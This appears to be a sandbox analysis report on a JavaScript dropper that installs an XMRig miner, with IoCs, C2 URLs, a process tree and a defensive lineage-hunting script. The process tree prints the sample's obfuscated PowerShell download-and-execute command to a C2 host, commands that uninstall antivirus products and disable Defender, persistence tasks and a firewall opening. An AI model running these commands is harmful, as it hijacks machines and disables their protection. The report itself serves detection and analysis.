Analysis

max time kernel: 150s
max time network: 148s
platform: windows7_x64
resource: win7v20201028
submitted: 18-02-2021 18:36

Static task: static1
Behavioral task: behavioral1
  Sample: readme.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: readme.js
  Resource: win10v20201028

General

Target: readme.js
Size: 9KB
MD5: e294d6f427c64f77b5b61bb7b17dd12c
SHA1: ccdae3ada854cc441106ec52c12823439bab6cba
SHA256: 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
SHA512: 2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a

Malware Config

Extracted C2 URLs:
http://t.zz3r0.com
http://t.zer9g.com
http://t.bb3u9.com
Signatures

XMRig Miner Payload (5 IoCs)
resource | yara_rule
C:\Windows\TEMP\m6.bin.ori | xmrig
\Windows\Temp\m6.bin.exe | xmrig
C:\Windows\Temp\m6.bin.exe | xmrig
C:\Windows\Temp\m6.bin.exe | xmrig
\Windows\Temp\m6.bin.exe | xmrig

Blocklisted process makes network request (8 IoCs)
flow | pid | process
6 | 1180 | powershell.exe
18 | 2628 | powershell.EXE
22 | 2740 | powershell.EXE
24 | 2740 | powershell.EXE
38 | 2644 | powershell.EXE
40 | 2644 | powershell.EXE
41 | 2628 | powershell.EXE
42 | 2628 | powershell.EXE

Executes dropped EXE (4 IoCs)
pid | process
3068 | biJkcCEA.exe
1564 | biJkcCEA.exe
2788 | biJkcCEA.exe
1776 | m6.bin.exe

Modifies Windows Firewall (1 TTPs)

Stops running service(s) (3 TTPs)

Loads dropped DLL (11 IoCs)
pid | process
1488 | cmd.exe
3908 | WerFault.exe (4 entries)
3036 | cmd.exe
1340 | taskmgr.exe (5 entries)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
47 | api.ipify.org
48 | api.ipify.org
Drops file in System32 directory (64 IoCs)
Most rows here are PowerShell's own command-analysis cache and the CryptnetUrlCache under the SYSTEM profile, i.e. side effects of PowerShell running as SYSTEM rather than deliberate drops. The rows that matter are the creation of C:\Windows\System32\Windowspowershell\V1.0\biJkcCEA.exe by powershell.EXE, and the fact that biJkcCEA.exe then writes the same PowerShell analysis cache, which is consistent with it being a renamed copy of powershell.exe.
In the ioc column, CA\ stands for C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\ and LL\ for C:\Windows\system32\config\systemprofile\AppData\LocalLow\.
description | ioc | process
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_321ea8af-0de6-4c9d-bd76-484c8512c028 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheIndex | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e | powershell.EXE
File created | C:\Windows\System32\Windowspowershell\V1.0\biJkcCEA.exe | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheIndex | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | powershell.EXE
File opened for modification | LL\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_79c2aacf-8393-4f52-b7a6-7a01c51aceb7 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_e28224f3-d2f8-4dde-be40-718da8c29e31 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheIndex | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_874f5106-2e38-489f-a5ef-3e78b7fa0687 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | powershell.EXE
File opened for modification | LL\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheIndex | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_c648cf66-c511-4b80-ae4e-74466b508812 | powershell.EXE
File opened for modification | C:\Windows\System32\Windowspowershell\V1.0\biJkcCEA.exe | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1ada7a34-ebaa-466b-9476-a49136c3a364 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheIndex | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_321ea8af-0de6-4c9d-bd76-484c8512c028 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_1fd9701d-c1a6-42d1-99eb-aa9cdd73a618 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheIndex | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 | biJkcCEA.exe
File opened for modification | LL\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 | biJkcCEA.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 | powershell.EXE
File opened for modification | CA\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 | biJkcCEA.exe
File opened for modification | CA\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 | biJkcCEA.exe
Launches sc.exe
sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description labels this "likely ransomware behaviour"; in this run the dropped payload is an XMRig miner (see "XMRig Miner Payload" above), so treat the label as a heuristic, not a verdict.

Program crash (1 IoCs)
pid | pid_target | process | target process
3908 | 2788 | WerFault.exe | biJkcCEA.exe

Creates scheduled task(s) (1 TTPs, 6 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
2072 | schtasks.exe
2112 | schtasks.exe
2072 | schtasks.exe
2584 | schtasks.exe
2524 | schtasks.exe
2584 | schtasks.exe

Gathers network information (2 TTPs, 4 IoCs)
Uses command-line utilities to view the network configuration.
pid | process
2476 | ipconfig.exe
1156 | NETSTAT.EXE
3288 | NETSTAT.EXE
2128 | ipconfig.exe
Modifies data under HKEY_USERS (52 IoCs)
All keys sit under \REGISTRY\USER\.DEFAULT (the profile loaded for the SYSTEM account), abbreviated HKU\.DEFAULT\ below. The SystemCertificates and Internet Settings\ZoneMap keys are created by the crypto and WinINet APIs on first use in that profile, so they confirm that biJkcCEA.exe and powershell.EXE ran as SYSTEM rather than showing deliberate tampering; the "Document Encryption" MuiCache string is PowerShell's own resource string.
description | ioc | process
Key created | HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | biJkcCEA.exe
Set value (int) | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.EXE
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
Set value (str) | HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | powershell.EXE
Key created | HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.EXE
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\trust | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | biJkcCEA.exe
Set value (data) | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80da078c2506d701 | powershell.EXE
Set value (int) | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\My | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | biJkcCEA.exe
Set value (data) | HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | biJkcCEA.exe
Set value (int) | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | powershell.EXE
Set value (int) | HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | biJkcCEA.exe
Set value (data) | HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\CA | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root | biJkcCEA.exe
Key created | HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | biJkcCEA.exe
Key created | HKU\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | biJkcCEA.exe
Opens file in notepad (likely ransom note) (1 IoCs)
The file opened is the sample itself (notepad C:\Users\Admin\AppData\Local\Temp\readme.js, see the process tree below): a decoy shown to the user while the hidden PowerShell stage runs. No ransom note is involved.
pid | process
896 | notepad.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | process
1180 | powershell.exe (2 entries)
2376 | powershell.EXE (2 entries)
2628 | powershell.EXE (2 entries)
2740 | powershell.EXE (2 entries)
3068 | biJkcCEA.exe (2 entries)
2788 | biJkcCEA.exe
1564 | biJkcCEA.exe (2 entries)
2788 | biJkcCEA.exe
2644 | powershell.EXE (2 entries)
2420 | powershell.exe (2 entries)
3908 | WerFault.exe (7 entries)
1564 | biJkcCEA.exe (the remaining 39 entries, up to the 64-entry cap)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
The report merges both behavioral tasks, so pids collide between them: 1564 is WMIC.exe in this table and biJkcCEA.exe in the tables above.
pid | process | privileges enabled
1180 | powershell.exe | SeDebugPrivilege
1092 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
1564 | WMIC.exe | the same 20 privileges as pid 1092
1664 | WMIC.exe | the same 20 privileges as pid 1092
1172 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege (table cut at the 64-entry cap)

Suspicious use of FindShellTrayWindow (64 IoCs)
pid | process
1340 | taskmgr.exe (64 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
One row is logged per WriteProcessMemory call, which is why each parent/child pair appears three times.
pid | process | target pid | target process | entries
1932 | wscript.exe | 1528 | cmd.exe | 3
1528 | cmd.exe | 896 | notepad.exe | 3
1528 | cmd.exe | 1180 | powershell.exe | 3
1180 | powershell.exe | 760 | cmd.exe | 3
1180 | powershell.exe | 1948 | cmd.exe | 3
1948 | cmd.exe | 1564 | WMIC.exe | 3
1180 | powershell.exe | 1812 | cmd.exe | 3
1812 | cmd.exe | 1664 | WMIC.exe | 3
1180 | powershell.exe | 1852 | cmd.exe | 3
1852 | cmd.exe | 1092 | WMIC.exe | 3
1180 | powershell.exe | 2028 | cmd.exe | 3
2028 | cmd.exe | 1172 | WMIC.exe | 3
1180 | powershell.exe | 1580 | cmd.exe | 3
1580 | cmd.exe | 1696 | WMIC.exe | 3
1180 | powershell.exe | 1728 | cmd.exe | 3
1728 | cmd.exe | 1644 | WMIC.exe | 3
1180 | powershell.exe | 1348 | cmd.exe | 3
1348 | cmd.exe | 1204 | WMIC.exe | 3
1180 | powershell.exe | 872 | cmd.exe | 3
1180 | powershell.exe | 2072 | schtasks.exe | 3
1180 | powershell.exe | 2112 | schtasks.exe | 3
1180 | powershell.exe | 2296 | schtasks.exe | 1 (table cut at the 64-entry cap)
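The flat "wrote to memory of" rows above only become useful once they are turned back into a tree and the lineage that matters (wscript.exe > cmd.exe > powershell.exe > cmd.exe > WMIC.exe) is matched. The Python below is an added example, not part of the report and not code from the sample: SAMPLE_RECORDS is constructed from a subset of the rows above in the report's own "PID A wrote to memory of B A parent child" layout, and the SUSPICIOUS lineage pattern is an assumption chosen to match this chain.

```python
"""Rebuild process lineage from sandbox 'wrote to memory of' records.

Added example for this report. The records and the lineage pattern below
are constructed/assumed; nothing here is code from the sample or the sandbox.
"""
import re

# Constructed from a subset of the WriteProcessMemory rows in the report.
# The sandbox logs one row per call, so the first pair is repeated on purpose.
SAMPLE_RECORDS = """
PID 1932 wrote to memory of 1528 1932 wscript.exe cmd.exe
PID 1932 wrote to memory of 1528 1932 wscript.exe cmd.exe
PID 1528 wrote to memory of 896 1528 cmd.exe notepad.exe
PID 1528 wrote to memory of 1180 1528 cmd.exe powershell.exe
PID 1180 wrote to memory of 1948 1180 powershell.exe cmd.exe
PID 1948 wrote to memory of 1564 1948 cmd.exe WMIC.exe
PID 1180 wrote to memory of 2072 1180 powershell.exe schtasks.exe
"""

# Row layout as printed in the report: the parent pid appears twice.
RECORD_RE = re.compile(
    r"PID (?P<parent>\d+) wrote to memory of (?P<child>\d+) (?P=parent) "
    r"(?P<parent_name>\S+) (?P<child_name>\S+)"
)


def parse_records(text):
    """Return (parent_of, name_of). Repeated rows for the same child collapse
    into a single edge because a child has exactly one parent."""
    parent_of, name_of = {}, {}
    for line in text.strip().splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not a record row
        parent, child = int(m["parent"]), int(m["child"])
        parent_of[child] = parent
        name_of[parent] = m["parent_name"]
        name_of[child] = m["child_name"]
    return parent_of, name_of


def lineage(pid, parent_of, name_of):
    """Walk from pid to the root and return the process names root-first."""
    chain, seen = [], set()
    while pid in name_of and pid not in seen:
        seen.add(pid)          # guards against a cycle in malformed input
        chain.append(name_of[pid])
        pid = parent_of.get(pid)
        if pid is None:
            break
    return list(reversed(chain))


def find_lineages(text, pattern):
    """Return (pid, lineage) for every process whose ancestry ends with
    `pattern` (case-insensitive image names, root-most first)."""
    parent_of, name_of = parse_records(text)
    want = [n.lower() for n in pattern]
    hits = []
    for pid in sorted(name_of):
        chain = lineage(pid, parent_of, name_of)
        if len(chain) >= len(want) and [n.lower() for n in chain[-len(want):]] == want:
            hits.append((pid, chain))
    return hits


# Assumed hunt pattern: the script-host -> shell -> PowerShell -> shell -> WMIC
# chain this report shows (script-launched PowerShell removing AV via wmic).
SUSPICIOUS = ["wscript.exe", "cmd.exe", "powershell.exe", "cmd.exe", "WMIC.exe"]

if __name__ == "__main__":
    for pid, chain in find_lineages(SAMPLE_RECORDS, SUSPICIOUS):
        print(pid, " > ".join(chain))
```

The same walk works on Sysmon event ID 1 (ParentProcessId/ProcessId) exports once the two pid fields and the two image fields are mapped onto the regex groups; matching on the tail of the lineage rather than on a single parent/child pair is what survives the extra cmd.exe hop this sample inserts between PowerShell and WMIC.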
Processes
-
[1] C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\notepad.exe
        notepad C:\Users\Admin\AppData\Local\Temp\readme.js
        - Opens file in notepad (likely ransom note)
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\Wbem\WMIC.exe
            wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \5E73AscDe2d /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn \5E73AscDe2d
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn tw6XxSsGFpu\TBOf76Y /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn tw6XxSsGFpu\TBOf76Y
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK /F /tr "powershell -w hidden -c PS_CMD"
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK
      [4] C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
